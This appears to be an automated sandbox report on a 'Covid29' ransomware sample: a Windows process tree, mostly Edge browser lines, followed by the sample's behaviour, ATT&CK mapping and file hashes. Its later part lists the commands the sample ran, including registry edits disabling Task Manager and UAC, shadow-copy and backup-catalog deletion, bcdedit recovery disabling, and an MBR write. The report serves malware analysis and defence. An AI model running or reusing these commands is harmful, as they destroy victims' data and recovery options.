C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8688a46f8,0x7ff8688a4708,0x7ff8688a47182⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:22⤵PID:1872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:82⤵PID:2428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:1428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:12⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:12⤵PID:2652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:82⤵PID:708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:12⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:12⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:12⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:12⤵PID:3728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵PID:4672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:12⤵PID:4424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:2368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:12⤵PID:4672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:12⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:12⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:12⤵PID:4672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:12⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵PID:904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:2084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5932 /prefetch:82⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:12⤵PID:3148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:12⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵PID:3760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:12⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:12⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:12⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:12⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:12⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7304 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7240 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:12⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:12⤵PID:5188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:12⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:12⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7428 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5956
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2052
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4880
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2540
-
C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe"C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
PID:2212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\TrojanRansomCovid29.bat" "2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3224 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:1020
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1160
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5172
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5204
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5220
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5236
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5312
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5332
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5496 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5900 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:5236
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:5408
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:4560
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:5248
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:5288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:5320
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:5456
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵
- Suspicious use of FindShellTrayWindow
PID:5984
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5464
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3556
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5564
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5372
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
5Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5ba6ef346187b40694d493da98d5da979
SHA1643c15bec043f8673943885199bb06cd1652ee37
SHA256d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA5122e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c
-
Filesize
152B
MD5b8880802fc2bb880a7a869faa01315b0
SHA151d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2
-
Filesize
99KB
MD553fe43bd52d01c4526dac06426e2b666
SHA1e9bf922a50f3832649d83f1da5c709a720d0ede9
SHA256c67c5c0750d7974cacc5c70cd74f78497c7f791182d6a2809f4ec8da2d7510c1
